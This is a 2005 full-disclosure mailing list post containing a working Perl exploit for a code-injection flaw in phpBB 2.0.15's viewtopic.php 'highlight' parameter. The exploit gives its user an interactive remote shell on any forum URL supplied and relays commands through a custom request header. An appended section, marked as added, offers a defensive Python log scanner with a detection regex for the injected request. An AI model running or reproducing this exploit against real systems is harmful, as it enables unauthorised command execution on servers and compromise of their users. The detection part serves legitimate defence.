
List:       full-disclosure
Subject:    [Full-disclosure] phpBB 2.0.15 exploit (w0op!)
From:       dab <dab () digitalsec ! net>
Date:       2005-06-29 23:44:24
Message-ID: Pine.LNX.4.63.0506300141470.29810 () fogheaven ! digitalsec ! net


See attached file.

-- 

dab @ !dSR
http://www.digitalsec.net
-
["phpbb2_0_15.pl" (text/plain)]

#!/usr/bin/perl 
# Wed Jun 29 19:08:04 CEST 2005 dab@digitalsec.net
#
# phpBB 2.0.15 -re-bug in viewtopic.php
# The complete Open Source Development with CVS: GNU General Public License
# Book on using CVS effectively  <---------  cvs, is also GPL
# or http://www.google.es/search?q=programming+howto
# 
# BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!
# 
# 
# Example: ./phpbb2_0_15.pl http://www.server.com/viewtopic.php?t=1
# You can start typing commands.
# Tested in BSD. Theo.. it works!
#
# !dSR: let all the hackers say YO!!
#
# 
 

use strict;
use IO::Socket;

unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }

$ARGV[0] =~ m!http://(.*?)/(.*?t=\d+)!;
my ($server, $port) = split (/:/,$1);
$port   = 80 unless defined($port);
$server  = $1 unless defined($server);
my ($url, $command) = $2;

print "$server - $port - $url\n";

while () {
		print "phpBB2.0.15> ";
		while(<STDIN>) {
				$command=$_;
				chomp($command);
				last;
		}
		&send($command);
}

sub send {
    my $ok	=	0;
    my $cmd	= "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
    my $string  = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
					"Host: $server\nPHP: $cmd\n\n\n\n";
    my $socket = IO::Socket::INET->new(PeerAddr => $server,
				PeerPort => $port,
				Proto    => "tcp",
				Type     => SOCK_STREAM)
				or die "can't connect to: $server : $@\n";
	print $socket $string;
	while(<$socket>) {
		if (/#PHPBBEXPLOIT#/) {
				close($socket) and last if $ok eq 2;
				$ok++;
				next;
		}
		print if $ok eq "1";
	}
}
exit 0;



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
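
What this request looks like from the server side, as an added example that is not part of the original post: the command travels in the `PHP:` request header, which default access logs do not record, so the check below keys on the `highlight` parameter of `viewtopic.php` instead. The log lines are constructed, and the Common Log Format layout and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Common Log Format (documentation IPs, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [30/Jun/2005:01:50:11 +0200] "GET /viewtopic.php?t=1&highlight=install HTTP/1.1" 200 18211
192.0.2.77 - - [30/Jun/2005:01:51:02 +0200] "GET /viewtopic.php?t=1&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1" 200 18650
192.0.2.77 - - [30/Jun/2005:01:51:09 +0200] "GET /viewtopic.php?t=1&highlight=%27.system(getenv(HTTP_PHP)).%27 HTTP/1.1" 200 18650
192.0.2.15 - - [30/Jun/2005:01:52:40 +0200] "GET /viewtopic.php?t=4&highlight=o'reilly HTTP/1.1" 200 17002
""".splitlines()

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A quote followed by PHP's "." concatenation operator and a function call.
INJECTION_RE = re.compile(r"""['"]\s*\.\s*[A-Za-z_]\w*\s*\(""")


def normalise(value, rounds=3):
    """Percent-decode until stable (bounded) so encoded quotes are seen as quotes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(lines):
    """Return (client_ip, decoded highlight value) for each flagged viewtopic.php hit."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if not target.path.endswith("viewtopic.php"):
            continue
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            value = normalise(value)
            if key == "highlight" and INJECTION_RE.search(value):
                hits.append((match.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} highlight={value!r}")
```

An ordinary search term containing an apostrophe, such as the last sample line, is not flagged because no concatenated function call follows the quote.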
